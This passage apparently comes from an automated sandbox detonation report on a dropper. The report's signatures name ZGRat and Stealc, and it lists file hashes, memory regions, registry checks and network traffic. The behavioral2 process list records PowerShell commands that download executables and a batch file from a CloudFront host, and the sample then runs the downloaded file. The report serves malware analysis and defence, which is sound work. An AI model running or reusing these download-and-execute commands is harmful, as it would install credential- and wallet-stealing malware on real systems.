| SHA256 | da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37 |
| SHA512 | 147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b |
memory/2068-181-0x0000000002A40000-0x0000000002A80000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | c15581f15cb485ebf003a522551d94f4 |
| SHA1 | 4dbf12f7073afb8d68788c9c356904fd81be38fa |
| SHA256 | 95983ad2acc6588efab96c1e84c957e546803f07c261688ee594a47dd9de9a01 |
| SHA512 | 9d203a279b97a777f8eb1640fb4142a4d7f57d2a62b49e1358717f6bc254b5a7b2bcbaf552f3c682183993490b6904d8a09caa00e6b059fccd08a855d292c286 |
\Users\Admin\AppData\Local\Temp\i1.exe
| MD5 | 310310bb16aa8aa907755ccf941932da |
| SHA1 | 875575b9a129cc000ecd7cf746946c52493be93f |
| SHA256 | 7ceec2cc762930cc62d97a10cfbe8fb4e14070847fdfac1e6ba3aa7e022f7d78 |
| SHA512 | 57ef834e7df28be011c4e047ce1ac1ec499da4cb3d1793370a9382380b649a1855834009c2144b2418ef5e4ae4c7d3d59781407ced5be28389dbc17a44ca584f |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\Users\Admin\AppData\Local\Temp\u248.0.exe
| MD5 | adaa7779ccd1879d9466706724ca2974 |
| SHA1 | af546b538b5362ee19131e8d30b633c817417d15 |
| SHA256 | 7109bdc186a84c29affbe2882b747b8c32587ce4e8d4b39e770faa06d94431d8 |
| SHA512 | 96fa1c074b4f268393f17b400711898178ce8479272d5b6ca1405568dbe63cc618b46bfb5b80a8b97a7a796f6d4b60c3727beb2b2a13d7e749b3746b736bff87 |
memory/1200-233-0x0000000061E00000-0x0000000061EF3000-memory.dmp
\Users\Admin\AppData\Local\Temp\u248.1.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/2744-270-0x0000000000400000-0x0000000002599000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | a10db157f0005ee9d0605ed50bb68254 |
| SHA1 | c1c5b90972786614bee58c843aa454ace925ebbc |
| SHA256 | 59769261cfa25f8bb730bc723e28c2bf640275f070ed3661a25f98b4925aec05 |
| SHA512 | a661d49b1f895a2a480252c8fc7b34c5ef670eb70071b11baf3ad767f49f5a0c7ac305fa2d14ac8c2e557c60b26559d07ff4aa5f7cc37ad906b3c431b0e2726c |
memory/1200-312-0x0000000000400000-0x0000000002575000-memory.dmp
memory/1588-315-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/1184-316-0x0000000001230000-0x0000000004A64000-memory.dmp
memory/1184-317-0x000000001EE20000-0x000000001EF2A000-memory.dmp
memory/1184-318-0x00000000009F0000-0x0000000000A00000-memory.dmp
memory/1184-319-0x0000000000AC0000-0x0000000000ACC000-memory.dmp
memory/1184-320-0x0000000000A00000-0x0000000000A14000-memory.dmp
memory/1184-321-0x000000001E3F0000-0x000000001E414000-memory.dmp
memory/1184-323-0x000000001E910000-0x000000001E91A000-memory.dmp
memory/1184-324-0x000000001E930000-0x000000001E95A000-memory.dmp
memory/1184-325-0x000000001EB60000-0x000000001EC12000-memory.dmp
memory/1184-326-0x00000000003F0000-0x00000000003FA000-memory.dmp
memory/1184-330-0x000000001FB20000-0x000000001FE20000-memory.dmp
memory/1184-333-0x0000000000410000-0x000000000041A000-memory.dmp
memory/1184-332-0x0000000000410000-0x000000000041A000-memory.dmp
memory/1184-334-0x0000000000AB0000-0x0000000000ABA000-memory.dmp
memory/1184-335-0x000000001DEE0000-0x000000001DF42000-memory.dmp
memory/1184-336-0x0000000000BA0000-0x0000000000BC2000-memory.dmp
memory/1184-339-0x000000001DFC0000-0x000000001DFCC000-memory.dmp
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
memory/1200-368-0x0000000000400000-0x0000000002575000-memory.dmp
memory/1184-369-0x0000000000410000-0x000000000041A000-memory.dmp
memory/1184-370-0x0000000000410000-0x000000000041A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\a156d2ee87eeb3012aacff4fcc5518f7fa0b2caa0b97ad5a5e46c2e4fdf8c5f4\897a5d602c274023b1e7209836972adc.tmp
| MD5 | 850578514eb2d824a4b75cd1cd735ec5 |
| SHA1 | 4f8b603a7da7363ccaae51801e11f5441b0041fc |
| SHA256 | 30ee1b565eb6cad8e8435e4b96be9f5cfb1015c476bd63f5290708e47542d85b |
| SHA512 | b7a691722859f212621b11cb9bd4725305a4aed7d03f455efac96122acb5abd3351ba7a43e7b1a67f4793edcdfed109bed5417bb9d8d00a50386148af7b8cd5e |
memory/1200-384-0x0000000000400000-0x0000000002575000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-10 08:26
Reported
2024-05-10 08:29
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.0.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\i1.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\u3tc.0.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u3tc.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u3tc.0.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe
"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsz4660.tmp\est.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=2838 /str=one
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"
C:\Users\Admin\AppData\Local\Temp\u3tc.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3tc.0.exe"
C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe
"C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4944 -ip 4944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 1156
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 628 -ip 628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 2404
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | d235izp073r941.cloudfront.net | udp |
| GB | 108.156.50.188:443 | d235izp073r941.cloudfront.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.161:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 188.50.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.178.204.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.216.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d2iv78ooxaijb6.cloudfront.net | udp |
| GB | 108.156.32.207:443 | d2iv78ooxaijb6.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 207.32.156.108.in-addr.arpa | udp |
| GB | 108.156.32.207:443 | d2iv78ooxaijb6.cloudfront.net | tcp |
| NL | 23.62.61.161:443 | www.bing.com | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | 59.128.172.185.in-addr.arpa | udp |
| GB | 108.156.32.207:443 | d2iv78ooxaijb6.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 240429000936002.mjt.kqri92.top | udp |
| BG | 94.156.35.76:80 | 240429000936002.mjt.kqri92.top | tcp |
| US | 8.8.8.8:53 | 76.35.156.94.in-addr.arpa | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | 228.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | 45.87.157.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| DE | 185.172.128.150:80 | 185.172.128.150 | tcp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.iolo.net | udp |
| FR | 185.93.2.245:443 | download.iolo.net | tcp |
| US | 8.8.8.8:53 | 245.2.93.185.in-addr.arpa | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | 139.53.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.145:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | 145.155.9.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsz4660.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\nsz4660.tmp\est.bat
| MD5 | f32d05160acf8325e9a09f09f80d16f4 |
| SHA1 | 46e159b71e6ef99076c4002e1fda134e1d0a86c9 |
| SHA256 | da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37 |
| SHA512 | 147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b |
memory/2356-18-0x00000000730FE000-0x00000000730FF000-memory.dmp
memory/2356-19-0x0000000002F00000-0x0000000002F36000-memory.dmp
memory/2356-21-0x0000000005580000-0x0000000005BA8000-memory.dmp
memory/2356-20-0x00000000730F0000-0x00000000738A0000-memory.dmp
memory/2356-22-0x0000000005510000-0x0000000005532000-memory.dmp
memory/2356-23-0x0000000005DE0000-0x0000000005E46000-memory.dmp
memory/2356-24-0x0000000005EC0000-0x0000000005F26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybxygzry.2k3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2356-30-0x0000000005F30000-0x0000000006284000-memory.dmp
memory/2356-35-0x00000000064E0000-0x00000000064FE000-memory.dmp
memory/2356-36-0x0000000006510000-0x000000000655C000-memory.dmp
memory/2356-37-0x0000000007D50000-0x00000000083CA000-memory.dmp
memory/2356-38-0x00000000069E0000-0x00000000069FA000-memory.dmp
memory/2356-41-0x00000000730F0000-0x00000000738A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/3420-43-0x00000000730F0000-0x00000000738A0000-memory.dmp
memory/3420-44-0x00000000730F0000-0x00000000738A0000-memory.dmp
memory/3420-54-0x00000000060E0000-0x0000000006434000-memory.dmp
memory/3420-55-0x00000000730F0000-0x00000000738A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8ea5744eda998b9b22800447be830aae |
| SHA1 | 6cc3315d1283cfeae08287e56492e722028d8dfe |
| SHA256 | c233dba76f23ee01142a8055ab90d6de76efec4cfad2a24a1ba8d193427c7048 |
| SHA512 | 36096c462946f5be4de818ca6b9197541dff168645aa64ca7e0891161c5773f8e82b847392ad2d1afb81fd6f57759e8edc895b5dbaa2871f327e5c36ec59355f |
memory/3420-59-0x00000000730F0000-0x00000000738A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\i1.exe
| MD5 | 310310bb16aa8aa907755ccf941932da |
| SHA1 | 875575b9a129cc000ecd7cf746946c52493be93f |
| SHA256 | 7ceec2cc762930cc62d97a10cfbe8fb4e14070847fdfac1e6ba3aa7e022f7d78 |
| SHA512 | 57ef834e7df28be011c4e047ce1ac1ec499da4cb3d1793370a9382380b649a1855834009c2144b2418ef5e4ae4c7d3d59781407ced5be28389dbc17a44ca584f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a49c1846790ffc87183f3bfb4b8d663c |
| SHA1 | b73c145eecb0ee7af4d7f854ec15084967f4e73a |
| SHA256 | 978b533b988203cb328cfa6801dc6839dfdb85ee04a828441c3fddaa87596dd5 |
| SHA512 | b80c5051b4ce9cf6639468a0b658053c443765873e988e9fe41dbe4aa1dd4f53b8ba0f8ca3d223e32a9aa596805df48f748d51eb1a51d6c8628b65c656c4f750 |
memory/4944-77-0x0000000000400000-0x0000000002599000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u3tc.0.exe
| MD5 | adaa7779ccd1879d9466706724ca2974 |
| SHA1 | af546b538b5362ee19131e8d30b633c817417d15 |
| SHA256 | 7109bdc186a84c29affbe2882b747b8c32587ce4e8d4b39e770faa06d94431d8 |
| SHA512 | 96fa1c074b4f268393f17b400711898178ce8479272d5b6ca1405568dbe63cc618b46bfb5b80a8b97a7a796f6d4b60c3727beb2b2a13d7e749b3746b736bff87 |
memory/4944-87-0x0000000000400000-0x0000000002599000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u3tc.1.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/4944-103-0x0000000000400000-0x0000000002599000-memory.dmp
memory/628-108-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/628-147-0x0000000000400000-0x0000000002575000-memory.dmp
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
memory/2336-189-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2336-201-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/4136-202-0x0000025D32C60000-0x0000025D36494000-memory.dmp
memory/4136-203-0x0000025D51B50000-0x0000025D51C5A000-memory.dmp
memory/4136-204-0x0000025D38150000-0x0000025D38160000-memory.dmp
memory/4136-205-0x0000025D51970000-0x0000025D5197C000-memory.dmp
memory/4136-206-0x0000025D38290000-0x0000025D382A4000-memory.dmp
memory/4136-207-0x0000025D519C0000-0x0000025D519E4000-memory.dmp
memory/4136-208-0x0000025D519E0000-0x0000025D519EA000-memory.dmp
memory/4136-209-0x0000025D51A10000-0x0000025D51A3A000-memory.dmp
memory/4136-210-0x0000025D51DB0000-0x0000025D51E62000-memory.dmp
memory/4136-211-0x0000025D51EB0000-0x0000025D51F00000-memory.dmp
memory/4136-212-0x0000025D51F00000-0x0000025D51F22000-memory.dmp
memory/4136-213-0x0000025D519F0000-0x0000025D519FA000-memory.dmp
memory/4136-217-0x0000025D51F30000-0x0000025D52230000-memory.dmp
memory/4136-219-0x0000025D56350000-0x0000025D56358000-memory.dmp
memory/4136-220-0x0000025D562D0000-0x0000025D56308000-memory.dmp
memory/4136-221-0x0000025D562A0000-0x0000025D562AE000-memory.dmp
memory/4136-222-0x0000025D562C0000-0x0000025D562C8000-memory.dmp
memory/4136-224-0x0000025D57420000-0x0000025D57482000-memory.dmp
memory/4136-225-0x0000025D57480000-0x0000025D574A2000-memory.dmp
memory/4136-223-0x0000025D57400000-0x0000025D5740A000-memory.dmp
memory/4136-226-0x0000025D579D0000-0x0000025D57EF8000-memory.dmp
memory/4136-229-0x0000025D56980000-0x0000025D5698C000-memory.dmp
memory/4136-234-0x0000025D56A60000-0x0000025D56AD6000-memory.dmp
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
memory/628-236-0x0000000000400000-0x0000000002575000-memory.dmp
memory/4136-241-0x0000025D52250000-0x0000025D5226E000-memory.dmp
memory/628-243-0x0000000000400000-0x0000000002575000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-10 08:26
Reported
2024-05-10 08:29
Platform
win7-20240220-en
Max time kernel
118s
Max time network
118s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 236
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-10 08:26
Reported
2024-05-10 08:29
Platform
win10v2004-20240226-en
Max time kernel
143s
Max time network
152s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4888 wrote to memory of 4656 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4888 wrote to memory of 4656 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4888 wrote to memory of 4656 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
